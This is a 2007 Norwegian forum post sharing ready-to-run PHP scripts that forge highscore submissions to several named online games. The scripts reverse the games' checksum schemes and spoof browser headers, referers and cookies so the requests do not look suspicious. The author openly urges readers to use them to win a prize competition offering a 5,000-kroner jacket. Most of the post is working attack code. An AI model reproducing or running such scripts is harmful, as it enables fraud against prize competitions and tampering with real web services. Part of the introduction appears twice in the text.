Da er det på'n igjen med hackingen. Skulle gjerne skrevet om noe annet, men akkurat nå kan jeg ikke bidra med noe annet av interesse. Denne gangen skal jeg ikke bare kjede dere med kode, jeg skal gi dere scripts dere kan bruke direkte. De som er interesserte i hacking/PHP får sikkert noe ut av å studere kildekodene til scriptene.
Det store spørsmålet er; hvor lang tid tar det før noen av spillprodusentene oppdaterer krypteringen sin etter dette? Spennende. Jeg linker ikke til spillene med URL i dette tråden, da det vil føre til at spillfolka får nFF som referer. Copy-paste URL'ene. Admin: please skru av KP til denne tråden, da alle kidsa kommer til å elske dette.
Blokkokopter
Link til spillet: internettopplysningen.no/blokko.php
Her er det ingen premier å vinne, men alle elsker dette spillet uansett, og det å ha navnet sitt på lista betyr masse. Eller gjør det egentlig det? Ikke hvis du følger denne linken. Om ti sekunder har du navnet ditt på toppen. Gratulerer!
For de mer interesserte, så er koden her:
Wave Navigator
Link til spillet: wavekjeden.no/navigator/
Her er det ukentlige premier, hvor du blant annet kan vinne HellyHansen-jakke til fem tusen kroner! Lyst på? Trykk her, da vel!
Kode:
Jævlig kode? Ikke min feil. Tok meg en del timer å nøste opp i driten. En verdig utfordring - tusen takk, Agensspill! Jeg har kommentert koden, så dere bør kjønne hva som skjer, om ikke annet.
Trysil Twintip
Link til spillet: trysiltwintip.visitnorway.com
Denne er også laget av Agensspill, de som laga Wave-tingen over. Konkurransen er desverre utløpt, men det hindrer ikke oss i å floode highscorelista! Gratulerer.
Her gir jeg ingen kode, fordi den er ca. lik Wave-tingen.
Holmenkollen Ski Jump
Link til spillet: skijump.visitnorway.com
Også laget av Agensspill, og også utløpt. Tjo-og-hei!
Takk til ulldott for serverplass! (6.1 KB)
Det store spørsmålet er; hvor lang tid tar det før noen av spillprodusentene oppdaterer krypteringen sin etter dette? Spennende. Jeg linker ikke til spillene med URL i dette tråden, da det vil føre til at spillfolka får nFF som referer. Copy-paste URL'ene. Admin: please skru av KP til denne tråden, da alle kidsa kommer til å elske dette.
Blokkokopter
Link til spillet: internettopplysningen.no/blokko.php
Her er det ingen premier å vinne, men alle elsker dette spillet uansett, og det å ha navnet sitt på lista betyr masse. Eller gjør det egentlig det? Ikke hvis du følger denne linken. Om ti sekunder har du navnet ditt på toppen. Gratulerer!
For de mer interesserte, så er koden her:
Kode
if ($_POST) { $data = getData($_POST); $score = $_POST["score"]; $changeold = $score*0.2-$score*90; $ch = init_(); for ($i=0; $i<10; $i++) { // Hvorfor gjør vi dette 10 ganger? $changeold-=0.3; // Fordi changeold-variablen er FØKKA. $result = send($ch, $data . $changeold); // Dette er en work-around. Ikke spør. if ($result) print $result; } curl_close($ch); } printForm($_POST); function getData() { $name = $_POST["name"]; $score = $_POST["score"]; $unique14 = 10+$score*0.13+0.01*$score; $unique03 = 31+$score/16+0.01*$score; $unique16 = 12+$score*0.05-0.2*$score; $unique09 = 61+$score/6+0.01*$score; $unique01 = 31+$score/2+0.01*$score; $unique15 = 68+$score/12+51-0.06*$score; $unique41 = 32+$score*0.01+0.01*$score; $unique11 = 76+$score/10+0.01*$score; $explosiondone = $score-280+$score*0.13; return "highstatus=OK&highname=$name&highscore=$score&unique14=$unique14&unique03=$unique03&unique16=$unique16&unique09=$unique09&unique01=$unique01&unique15=$unique15&unique41=$unique41&unique11=$unique11&explosiondone=$explosiondone&changeold="; } function send($ch, $data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); return curl_exec($ch); } function init_() { $url = "http://www.internettopplysningen.no/blokko/blokkokopter_posthigh.php"; $referer = "http://www.internettopplysningen.no/blokko/"; $agent = "Opera/9.10 (Macintosh; Intel Mac OS X; U; en)"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_REFERER, $referer); return $ch; } function printForm($_POST) { $score = $_POST["score"]; $name = $_POST["name"]; print "<title>Blokko</title> <h1>Blokko</h1> <form action='' method='post'> name: <input type='text' name='name' value='$name'><br> score: <input type='text' name='score' value='$score'><br><br> <input type='submit' name='submit' value='Send'><br><br> </form> Copyleft 2007 dexter"; }
Link til spillet: wavekjeden.no/navigator/
Her er det ukentlige premier, hvor du blant annet kan vinne HellyHansen-jakke til fem tusen kroner! Lyst på? Trykk her, da vel!
Kode:
Kode
$title = "Wave-ting"; // Tittelen til scriptet. if ($_POST) { $id = getId(); // Vi lager en ID som skal bli sendt hver gang vi gjør en spørring for å identifisere oss. $k = getK(load_($id)); // Vi gjør en spørring, og får en "k"-variabel tilbake. Denne trenger vi til senere. spill($id); // Vi gir beskjed til spillet om at det er i gang. lagre($_POST, $k); // Vi lagrer scoren og gir med k-variabelen for verifikasjon. } printForm($title); // Vi printer ut skjema så brukeren kan plotte personalia og poengsum. function getK($str) { // Vi henter K fra serverens respons. return substr($str, 4, 10); } function getId() { // Vi lager vår ID slik den blir laget i spillet. $time = microtime(true)*10000; $k = substr($time,1,12) . rand(0,1000); return $k; } function lagre($_POST, $k) { $score = 90000 - $_POST["score"]; $user = heal($score, $k); // "Heal" er en funskjon i spillet som lager en string basert på poeng og k-variabelen. Jeg porta den til PHP. $nick = urlencode($_POST["nick"] . " "); $epost = urlencode($_POST["epost"]); $data = "streng=streng&land=0&epost=$epost&nick=$nick&user=$user&score=$score&handling=lagrespill&identifikator=$identifikator"; print "<br>". $result = send($data); // Alle data blir sendt og vi er glade. } function spill($id) { $data ="handling=spill&identifikator=$identifikator"; return send($data); } function load_($id) { $data ="handling=load&identifikator=$id"; return send($data); } function printForm($title) { // Skjemaet som først vises, der brukeren print ( // skriver inn personalia og ønsket poengsum. "<meta http-equiv='Content-Type' content='text/html;charset=utf-8'/> <title>$title</title> <h1>$title</h1> Dette scriptet er laget for læringens skyld og skal ikke brukes av noen.<br><br> <form action='' method='post'> score: <input type='text' name='score' value=''><br> nick: <input type='text' name='nick' value=''><br> epost: <input type='text' name='epost' value=''><br><br> <input type='submit' name ='submit' value='Send'><br> </form> Copyleft 2007 dexter "); } function send($data) { // Det er denne funksjonen som sender data. $url = "http://www.agensspill.no/wave/navigator/input.php"; // Den mimicer alle aspekter av en browser, $cookie = "kjeks.txt"; // så det ikke ser suspekt ut. $agent = "Opera/9.10 (Macintosh; Intel Mac OS X; U; en)"; $referer = "http://www.agensspill.no/visitnorway/holmenkollen/"; $header[] = "Host: www.agensspill.no"; $header[] = "Cookie: _CC=visit"; $header[] = "Content-Length: " . strlen($data); $header[] = "Content-type: application/x-www-form-urlencoded"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie); // Vi oppretter en kjeksfil som spillet/nettsiden curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); // kan styre med. Nå kan vi se bort fra kjeks! curl_setopt($ch, CURLOPT_USERAGENT, $agent); // Vi mimicer useragent curl_setopt($ch, CURLOPT_REFERER, $referer); // og referer. curl_setopt($ch, CURLOPT_POST, 1); // Denne betyr at vi sender POST (i motsetning til GET) curl_setopt($ch, CURLOPT_POSTFIELDS, $data); // Vi sender med postdata, curl_setopt($ch, CURLOPT_HTTPHEADER, $header); // og headeren. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // Denne gjør at serverresponsen blir returnert. $result = curl_exec($ch); // Vi kjører spørringen, curl_close($ch); // avslutter curl, return $result; // og returnerer serverresponsen. } function heal($a, $b) { // Dette er en port av algoritmen $h = 10; // som blir brukt i spillet til $k = 1; // å lage en kryptert kontrollstreng. $c = 11; $o = 12; $r = 90; $g = 65; $v16 = $a + $b; $v14 = $a + 5432; $v12 = $a + $b + $h - $k; $v10 = $v16 . "/" . $v14 . "/" . $v12 . "/"; $v2 = $k; while ($v6 < strlen($v10)) { $v3 = substr($v10, $v6, $k); if ($v3 == ".") $v4 = $c + $v2; else if ($v3 == "/") $v4 = $o + $v2; else if ($v3 == "0") $v4 = $h + $v2; else $v4 = $v3 + $v2; $v8 .= chr($v4 + 65); $v2++; if ($v2 == $h) $v2 = $c - $h - $k; $v6++; } $b = 0; while ($b <= strlen($v8)) { $v9 .= substr($v8, strlen($v8) - $b, 1); $b++; } $v13 = $v9; $max = getrandmax(); while ($v5 < strlen($v9)) { $v11 .= chr(floor(rand(0,$max)*($r - $g + $k)/$max) + $g) . chr(floor(rand(0,$max)*($r - $g + $k)/$max) + $g) . substr($v9, $v5, 1); $v5++; } return $v11; }
Trysil Twintip
Link til spillet: trysiltwintip.visitnorway.com
Denne er også laget av Agensspill, de som laga Wave-tingen over. Konkurransen er desverre utløpt, men det hindrer ikke oss i å floode highscorelista! Gratulerer.
Her gir jeg ingen kode, fordi den er ca. lik Wave-tingen.
Holmenkollen Ski Jump
Link til spillet: skijump.visitnorway.com
Også laget av Agensspill, og også utløpt. Tjo-og-hei!
Takk til ulldott for serverplass! (6.1 KB)
Sist endret av liasis; 8. august 2007 kl. 03:54.